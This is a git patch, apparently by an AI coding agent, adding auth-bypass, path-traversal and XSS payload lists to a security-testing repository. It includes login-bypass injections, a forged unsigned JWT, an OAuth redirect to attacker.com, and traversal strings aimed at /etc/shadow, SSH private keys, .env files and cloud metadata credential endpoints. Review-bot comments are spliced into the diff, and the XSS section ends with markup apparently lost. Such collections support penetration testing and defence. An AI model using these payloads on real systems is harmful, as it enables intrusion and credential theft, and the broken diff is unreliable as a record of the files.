From b58ed035c8eb3909f29736c7a98f986ada945e87 Mon Sep 17 00:00:00 2001
From: "copilot-swe-agent[bot]" <198982749+Copilot@users.noreply.github.com>
Date: Mon, 5 Jan 2026 14:53:43 +0000
Subject: [PATCH] Enhance existing vulnerabilities with comprehensive payloads (XSS, Auth Bypass, Path Traversal) and update README

Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>
---
 .../auth-bypass-payloads.txt | 223 ++++++++++++++
 Path-Traversal/path-traversal-payloads.txt | 290 ++++++++++++++++++
 README.md | 4 +
 XSS/xss-payloads.txt | 212 +++++++++++++
 4 files changed, 729 insertions(+)

diff --git a/Authentication-Bypass/auth-bypass-payloads.txt b/Authentication-Bypass/auth-bypass-payloads.txt
index b9de7fa..5ac9a7a 100644
--- a/Authentication-Bypass/auth-bypass-payloads.txt
+++ b/Authentication-Bypass/auth-bypass-payloads.txt
@@ -45,3 +45,226 @@ X-Original-URL: /admin
 X-Rewrite-URL: /admin
 X-Originating-IP: 127.0.0.1
 X-Remote-Addr: 127.0.0.1
+X-Custom-IP-Authorization: 127.0.0.1
+X-Client-IP: 127.0.0.1
+X-Real-IP: 127.0.0.1
+X-Host: localhost
+X-Forwarded-Host: localhost
+
+# URL path manipulation
+/admin/..;/
+/admin/%2e%2e%3b/
+/./admin/./
+/admin;/
+/admin..
+//admin//
+/./admin/./panel
+/%2e/admin
+/admin/~
+/admin#
+/admin?
+
+# HTTP verb tampering
+GET /admin
+POST /admin
+HEAD /admin
+PUT /admin
+DELETE /admin
+OPTIONS /admin
+TRACE /admin
+PATCH /admin
+
+# Case manipulation
+/Admin
+/ADMIN
+/AdMiN
+/aDmIn
+
+# Unicode bypass
+/admin%c0%af
+/admin%e0%80%af
+/admin%c0%ae%c0%ae/
+/%61dmin
+
+# Double encoding
+/%252e%252e%252fadmin
+/%252e%252e/admin
+
+# Null byte injection
+/admin%00
+/admin%00.html
+/admin%00.jpg
+
+# Credential stuffing patterns
+admin:admin
+administrator:administrator
+root:root
+admin:password
+admin:123456
+admin:admin123
+test:test
+guest:guest
+user:user
+demo:demo
+
+# Default credentials bypass
+username=admin&password=
+username=&password=
+username=admin&password=%20
+username=admin&password=*
+
+# Password reset bypass
+email=victim@example.com&email=attacker@example.com
+token=&email=attacker@example.com
+token=0
+token=null
+token=false
+
+# OTP/2FA bypass
+otp=000000
+otp=123456
+otp=111111
+otp=
+otp=%20
+otp=null
+
+# Response manipulation
+# Change HTTP response from 401/403 to 200
+# Change "authenticated": false to "authenticated": true
+# Change "role": "user" to "role": "admin"
+
+# JWT manipulation (see JWT-Vulnerabilities for more)
+Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.
+Authorization: Bearer null +Authorization: Bearer +Authorization: + +# GraphQL authentication bypass +{"query":"mutation{login(username:\"admin\",password:\"' OR '1'='1\"){token}}"} +{"query":"{users{id username password}}"} + +# XML authentication bypass +admin' OR '1'='1 + +# LDAP authentication bypass +username=* +username=admin)(|(password=* +username=*)(uid=*))(|(uid=* + +# OAuth/OIDC bypass +redirect_uri=https://attacker.com +state= +nonce= +code= + +# API key bypass +api_key= +X-API-Key: +Authorization: +apikey=null + +# Session fixation +PHPSESSID=attacker_controlled_session +jsessionid=12345 + +# CAPTCHA bypass +captcha= +g-recaptcha-response= +h-captcha-response= +captcha_response=03AAYGu2... +recaptcha= + +# Rate limiting bypass +X-Forwarded-For: random_ip_each_request +X-Originating-IP: random_ip_each_request +X-Remote-IP: random_ip_each_request + +# Account enumeration +username=admin&password=wrong +username=nonexistent&password=wrong + +# Login form variations +user[admin]=1 +user[role]=admin +username[]=admin +password[]=anything + +# Time-based bypass +wait_for_rate_limit=true +timestamp=future_date +valid_until=9999999999 + +# Magic hashes (PHP type juggling) +# 0e215962017 == 0 (PHP) +# 0e291242476940776845150308577824 == 0 +password=0e215962017 +password=240610708 + +# Unicode normalization +username=ⓐⓓⓜⓘⓝ +username=𝒶𝒹𝓂𝒾𝓃 +username=admin + +# Homograph attack +username=αdmin (Greek alpha) +username=аdmin (Cyrillic а) + +# Whitespace bypass +username= admin +username=admin +username=%20admin +username=admin%20 + +# Special characters +username=admin' +username=admin" +username=admin` +username=admin\ + +# Email bypass for authentication +email=admin@localhost +email=admin@127.0.0.1 +email=@example.com +email=victim@attacker.com + +# Host header authentication bypass +Host: localhost +Host: 127.0.0.1 +Host: internal.company.com + +# Referer bypass +Referer: https://trusted-site.com +Referer: https://localhost + +# Origin bypass +Origin: 
https://trusted-site.com +Origin: null + +# Authentication via GET instead of POST +GET /api/login?username=admin&password=admin123 + +# File inclusion for authentication bypass +/etc/passwd +../../../../../../etc/passwd + +# SSRF to bypass authentication +url=http://localhost/admin +url=http://127.0.0.1/admin +url=http://169.254.169.254/latest/meta-data/ + +# Request smuggling for authentication bypass +Content-Length: 0 +Transfer-Encoding: chunked + +# Race conditions +# Send multiple authentication requests simultaneously + +# Business logic bypass +step=1&step=3 +status=pending&status=approved +verified=false&verified=true + +# Broken authentication chain +# Skip step 2 in multi-step authentication +# Reuse old session tokens +# Replay old authentication requests diff --git a/Path-Traversal/path-traversal-payloads.txt b/Path-Traversal/path-traversal-payloads.txt index d3d9a8d..5c141f7 100644 --- a/Path-Traversal/path-traversal-payloads.txt +++ b/Path-Traversal/path-traversal-payloads.txt 
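Review bot: Under `# Homograph attack` the explanation is embedded in the payload line itself (`username=αdmin (Greek alpha)`, `username=аdmin (Cyrillic а)`), so a consumer that reads this file line by line gets the parenthetical as part of the value; move it to a preceding comment, `# Greek alpha / Cyrillic а look-alikes for "admin"`, and keep the entries bare. The same applies to placeholder entries such as `X-Forwarded-For: random_ip_each_request` and `timestamp=future_date`, which describe a technique rather than give a literal value, and to the comment-only `# Response manipulation` and `# Race conditions` sections; a short comment stating that `#` lines are notes, not payloads, would make the convention explicit. `Authorization:` is added twice (once in the JWT section, once under `# API key bypass`), and the `# File inclusion` and `# SSRF` entries duplicate the Path-Traversal and SSRF lists, where a one-line cross-reference would do instead of copies.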
@@ -55,3 +55,293 @@
 ../../../.env
 ../../../web.config
 ../../../application.properties
+
+# Advanced encoding techniques
+..%c0%af
+..%c1%9c
+..%e0%80%af
+..%f0%80%80%af
+..%c0%2f
+..%c0%5c
+
+# Unicode bypass
+..%u2216
+..%u2215
+..%uEFC8
+..%uF025
+
+# 16-bit Unicode
+..%c0%af
+..%c1%9c
+%c0%ae%c0%ae/
+%c0%ae%c0%ae%c0%af
+
+# UTF-8 encoding
+%e0%80%ae%e0%80%ae/
+%c0%2e%c0%2e/
+%uff0e%uff0e/
+
+# Overlong UTF-8
+..%c0%af
+..%e0%80%af
+..%c0%2e%c0%2e%c0%2f
+
+# Backslash variations
+..\
+..\..
+..\\
+..\\..\\
+%2e%2e%5c
+%2e%2e%2f
+
+# Mixed slash/backslash
+..\/
+..\/..\
+../\..\
+..\/../
+
+# Absolute path bypass
+/etc/passwd
+/etc/shadow
+/etc/hosts
+/var/log/apache2/access.log
+/var/log/auth.log
+/proc/self/environ
+/proc/self/cmdline
+/proc/self/fd/0
+/proc/self/fd/1
+/proc/self/fd/2
+
+# Windows absolute paths
+C:\Windows\System32\drivers\etc\hosts
+C:\Windows\System32\config\SAM
+C:\Windows\System32\config\SYSTEM
+C:\boot.ini
+C:\inetpub\wwwroot\web.config
+
+# Nested traversal
+....//
+....\/
+..../\
+....\\
+
+# Dot segment bypass
+./../
+./../../
+././../
+./.././../
+
+# Multiple slashes
+...//
+..../// 
+.....////
+
+# Filter bypass with current directory
+.//.//.//.//..//
+.//.//.//.//.//
+
+# Stripped traversal (if ../ is filtered)
+...//...//
+....\/....\/
+..;/..;/
+..;//..;//
+
+# Null byte variations
+../../../etc/passwd%00
+../../../etc/passwd%00.png
+../../../etc/passwd\x00
+../../../etc/passwd\0
+
+# Path normalization bypass
+/var/www/../../etc/passwd
+/./var/./www/./../../etc/passwd
+//var//www//../../etc/passwd
+
+# URL parameter pollution
+?file=safe.txt&file=../../../etc/passwd
+?path=images&path=../../../etc/passwd
+
+# Common web files
+../../../index.php
+../../../index.html
+../../../wp-config.php
+../../../configuration.php
+../../../settings.php
+../../../config.php
+../.git/config
+../.env
+../.htaccess
+
+# Framework-specific files
+# Laravel
+../../../.env
+../../../storage/logs/laravel.log
+../../../config/database.php
+../../../config/app.php
+
+# Symfony
+../../../.env.local
+../../../config/packages/security.yaml
+../../../var/log/dev.log
+
+# Django
+../../../settings.py
+../../../manage.py
+../../../db.sqlite3
+
+# Spring Boot
+../../../application.properties
+../../../application.yml
+../../../application-prod.properties
+
+# Ruby on Rails
+../../../config/database.yml
+../../../config/secrets.yml
+../../../Gemfile
+
+# Node.js/Express
+../../../package.json
+../../../.env
+../../../config/default.json
+
+# ASP.NET
+../../../web.config
+../../../Web.config
+../../../appsettings.json
+../../../appsettings.Production.json
+
+# Java
+../../../WEB-INF/web.xml
+../../../META-INF/context.xml
+../../../WEB-INF/classes/application.properties
+
+# Cloud provider metadata
+../../../../../../proc/self/environ
+../../../../../../proc/version
+../../../../../../proc/cmdline
+
+# AWS metadata
+http://169.254.169.254/latest/meta-data/
+http://169.254.169.254/latest/user-data/
+http://169.254.169.254/latest/dynamic/instance-identity/document
+
+# Azure metadata
+http://169.254.169.254/metadata/instance?api-version=2021-02-01
+
+# GCP metadata
+http://metadata.google.internal/computeMetadata/v1/
+http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
+
+# Docker
+../../../../../../proc/self/cgroup
+../../../../../../proc/self/mountinfo
+../../../../../../etc/hostname
+
+# Log files
+../../../var/log/apache2/access.log
+../../../var/log/apache2/error.log
+../../../var/log/nginx/access.log
+../../../var/log/nginx/error.log
+../../../var/log/auth.log
+../../../var/log/syslog
+../../../var/log/mail.log
+../../../var/log/mysql/error.log
+
+# Windows log files
+C:\Windows\System32\winevt\Logs\Application.evtx
+C:\Windows\System32\winevt\Logs\Security.evtx
+C:\Windows\System32\winevt\Logs\System.evtx
+
+# SSH keys
+../../../root/.ssh/id_rsa
+../../../root/.ssh/id_dsa
+../../../root/.ssh/authorized_keys
+../../../home/user/.ssh/id_rsa
+../../../home/user/.ssh/authorized_keys
+
+# Database files
+../../../var/lib/mysql/mysql/user.MYD
+../../../var/lib/postgresql/data/pg_hba.conf
+../../../var/lib/mongodb/data/db
+
+# Backup files
+../../../backup.sql
+../../../database.sql
+../../../db_backup.sql
+../../../site_backup.tar.gz
+../../../backup.zip
+
+# Source code files
+../../../.git/HEAD
+../../../.git/config
+../../../.git/logs/HEAD
+../../../.svn/entries
+../../../.hg/hgrc
+
+# Session files
+../../../tmp/sess_*
+../../../var/lib/php/sessions/sess_*
+../../../tmp/sessions/*
+
+# Cache files
+../../../tmp/cache/*
+../../../var/cache/*
+../../../storage/cache/*
+
+# Temporary files
+../../../tmp/*
+../../../temp/*
+../../../var/tmp/*
+
+# SSRF via path traversal
+file:///etc/passwd
+file:///C:/Windows/System32/drivers/etc/hosts
+file://localhost/etc/passwd
+file://127.0.0.1/etc/passwd
+
+# Path traversal in cookies
+Cookie: file=../../../etc/passwd
+Cookie: path=../../../var/www/html/index.php
+
+# Path traversal in headers
+X-File: ../../../etc/passwd
+X-Path: ../../../var/www/html/config.php
+User-Agent: ../../../etc/passwd
+Referer: ../../../etc/passwd
+
+# Path traversal in JSON
+{"file":"../../../etc/passwd"}
+{"path":"../../../var/www/html/config.php"}
+{"template":"../../../etc/passwd"}
+
+# Path traversal in XML
+../../../etc/passwd
+../../../var/www/html/config.php
+
+# Polyglot path traversal
+....//....//....//etc/passwd
+..%252f..%252f..%252fetc/passwd
+..%c0%af..%c0%af..%c0%afetc/passwd
+
+# Filter evasion
+..%00/..%00/..%00/etc/passwd
+..%20/..%20/..%20/etc/passwd
+..%09/..%09/..%09/etc/passwd
+
+# Case sensitivity (Windows)
+..\\..\\..\\..\\..\\..\\..\\.\\ETC\\PASSWD
+..\\..\\..\\..\\..\\..\\..\\.\\Etc\\Passwd
+
+# Alternate data streams (Windows)
+../../../test.txt::$DATA
+../../../test.txt::$INDEX_ALLOCATION
+
+# UNC paths (Windows)
+\\\\localhost\\C$\\Windows\\System32\\drivers\\etc\\hosts
+\\\\127.0.0.1\\C$\\Windows\\System32\\config\\SAM
+
+# Mac/Linux specific
+../../../etc/passwd +../../../etc/master.passwd +../../../private/etc/master.passwd +../../../Library/Preferences/SystemConfiguration/com.apple.airport.preferences.plist diff --git a/README.md b/README.md index 321da98..7ab31ad 100644 --- a/README.md +++ b/README.md @@ -12,6 +12,7 @@ This repository contains a complete collection of testing payloads organized by - **[NoSQL Injection](./NoSQL-Injection/)** - NoSQL database injection (MongoDB, Redis, CouchDB) - **[XSS (Cross-Site Scripting)](./XSS/)** - Client-side code injection - **[Command Injection](./Command-Injection/)** - OS command execution & symbolic link attacks +- **[SSTI (Server-Side Template Injection)](./SSTI/)** - Template engine exploitation & RCE - **[CSV Injection](./CSV-Injection/)** - Formula injection in spreadsheets - **[LDAP Injection](./LDAP-Injection/)** - Directory service manipulation - **[Log Injection](./Log-Injection/)** - Log file manipulation @@ -34,6 +35,9 @@ This repository contains a complete collection of testing payloads organized by **Configuration & Design:** - **[Security Misconfiguration](./Security-Misconfiguration/)** - Default credentials, misconfigurations +- **[CORS Misconfiguration](./CORS-Misconfiguration/)** - Cross-origin resource sharing issues +- **[HTTP Request Smuggling](./HTTP-Request-Smuggling/)** - Request desynchronization attacks +- **[JWT Vulnerabilities](./JWT-Vulnerabilities/)** - JSON Web Token implementation flaws - **[Business Logic](./Business-Logic/)** - Business logic flaws - **[Weak Cryptography](./Weak-Cryptography/)** - Weak crypto implementations - **[Vulnerable Components](./Vulnerable-Components/)** - Known vulnerable libraries diff --git a/XSS/xss-payloads.txt b/XSS/xss-payloads.txt index cec7e12..f1d8aae 100644 --- a/XSS/xss-payloads.txt +++ b/XSS/xss-payloads.txt 
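Review bot: The `# AWS metadata`, `# Azure metadata` and `# GCP metadata` entries (`http://169.254.169.254/...`, `http://metadata.google.internal/...`) and the `file://` lines under `# SSRF via path traversal` are full URLs rather than traversal fragments, so they belong in the SSRF list, with a `# see SSRF/` cross-reference here instead of copies. The hunk also duplicates itself and the file: `..%c0%af` is listed under three headings and `..%e0%80%af` under two, and the three context lines at the top (`../../../.env`, `../../../web.config`, `../../../application.properties`) are re-added under `# Laravel`, `# ASP.NET` and `# Spring Boot`, with `../../../.env` appearing again under `# Node.js/Express`. Entries ending in `*` under `# Session files`, `# Cache files` and `# Temporary files` are glob patterns, not literal paths, and the `Cookie:`, `X-File:` and JSON lines are request wrappers rather than paths; a comment such as `# Entries below are carriers (header, cookie, JSON) for the traversal strings above` at the `# Path traversal in cookies` heading would make the distinction explicit. The `# Path traversal in XML` section lists two plain paths with no XML around them, which looks like lost markup; worth confirming against the committed file.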
@@ -541,3 +541,215 @@ a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e); # SVG/HTML nesting XSS + +# Modern XSS vectors and WAF bypasses + +# AngularJS template injection +{{constructor.constructor('alert(1)')()}} +{{$on.constructor('alert(1)')()}} +{{$eval.constructor('alert(1)')()}} +{{$parent.constructor('alert(1)')()}} +
{{$eval.constructor('alert(1)')()}}
+ +# VueJS template injection +{{constructor.constructor('alert(1)')()}} +{{_c.constructor('alert(1)')()}} +
+ +# React JSX injection + +
'}} /> + +# Mutation XSS (mXSS) +